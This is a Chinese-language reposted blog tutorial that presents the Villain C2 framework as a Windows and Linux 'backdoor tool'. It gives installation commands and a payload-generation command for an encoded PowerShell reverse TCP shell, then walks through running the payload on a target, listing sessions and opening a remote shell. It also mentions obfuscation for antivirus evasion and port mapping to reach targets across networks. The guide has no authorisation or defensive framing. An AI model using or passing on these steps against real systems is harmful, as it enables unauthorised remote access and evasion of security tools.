本文为大家介绍一款基于Windows和Linux和C2框架Villain的安装和使用。支持文件上传和多个会话之间的切换。
关于
Villain是一个C2框架,可以处理多个基于TCP和HoaxShell的反向shell。并且自动化加密payload来逃逸杀毒软件。
安装
git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt
运行
使用教程
这里我们以生成windows系统为例。生成一个shell.
generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 encode
我们在cmd中运行powershell命令。效果如下
这时候,在终端中就可以看到,目标已经上线了。
查看当前会话
我们输入命令sessions便可以看到,与当前主机连接的会话。
连接会话
我们利用shell+会话id便可以与当前会话建立连接。如
shell 9aa63a-b88b6b-901ce3
如上,我们成功进入了系统的shell。
注意事项
-
Villain 具有内置的自动混淆有效载荷功能,可免杀(实测效果一般) -
每个生成的有效负载只会工作一次。已经使用过的有效负载不能重新用于建立会话。 -
如果两个设备不在同一局域网,需要做端口映射。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):一款基于C2框架的Windows&Linux后门工具
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/151523.html
